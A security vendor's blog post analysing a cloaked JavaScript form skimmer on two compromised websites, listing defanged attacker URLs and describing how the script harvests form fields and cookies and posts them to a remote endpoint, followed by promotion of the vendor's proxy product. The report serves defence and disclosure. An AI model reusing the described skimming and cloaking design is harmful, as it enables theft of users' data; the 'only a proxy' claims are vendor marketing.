Linkedin Tag

Back to blog

New client-side attack only a proxy could stop

Saturday, December 21st, 2024

H

Himanshu Anand

In addition to our proxy-based security service, we’re constantly crawling the web to uncover malicious scripts hiding on websites. This weekend, we flagged some suspicious activity on a couple of compromised sites.

Our investigation found that fasilajouer[.]com and copie-express[.]eu were serving malicious JavaScript through the following URLs:

  • https://wt9478748.ought858.network/9ee7be/stat[.]php
  • https://mf80930039.ought858.network/d385b7/stat[.]php

Initially the scripts seemed harmless, delivering nothing more than a simple jQuery.noConflict() command during static analysis. But what we saw live on the infected sites told a very different story.

The full malicious payload can be reviewed here.

This script is a pretty advanced master of disguise. When fetched in isolation, it serves up a harmless jQuery.noConflict() script. But on compromised websites, it transforms into an obfuscated, data-stealing one, designed to slip past standard security tools.

Analysis of the malicious JavaScript

In detail

  • Data Collection:<input> fields: Captures field names/IDs and user-entered values.<select> elements: Records selected options.<textarea> fields: Extracts text content.Data is encoded using btoa and stored in kCNQz6sIkvX.
  • Cookie Utilization:The function ccaj3Q8zYOk(name) extracts and updates cookies like PHP_SID to track session data and avoid duplicate transmissions.
  • Data Transmission:The harvested data is sent to a remote server via XMLHttpRequest with a POST request to:
    https://gj51015259.ought858.network/75d240/track[.]php
  • Event Triggering:A click listener (document.addEventListener('click')) triggers the data collection function (Eros2SjseYx) on every user interaction.The DOMContentLoaded event ensures execution when the page loads.

How only a proxy solves this

The malicious script behaves differently depending on how it is fetched. But on infected websites, it transforms into an obfuscated data-exfiltration payload designed to evade detection.

Traditional scanners, crawlers, or static analysis tools would more than likely only detect the benign version, overlooking the malicious behavior entirely.

The important part to take away from this is the following: the script’s behavior changes depending on how it’s fetched. Viewed in isolation, it looks completely innocent. But on infected websites, it’s a different story—an obfuscated payload built to exfiltrate user data.

Traditional scanners, crawlers, or static analysis tools would only catch the benign version, completely missing the malicious behavior.

This is where c/side shines. By routing every request through our proxy, we analyze scripts in real time, catching dynamic and event-driven behaviors like this one. Only scripts that pass our tests are sent to the user’s browser with no or minimal latency.

This allows us to detect dynamic, event-driven behaviors, such as those shown in this live example. Tools that fail to monitor the full lifecycle of a script's interactions are likely to miss these signs.

The devil's in the details. And c/side is built to catch them.

Additionally, we archive every version of the script for further analysis through our dashboard, giving you full visibility. Our deobfuscation and AI analysis highlights exactly what the script changes are.

Competitors who don't use a proxy are likely to miss these types of attacks.

H

More About Himanshu Anand

I'm a software engineer and security analyst at c/side.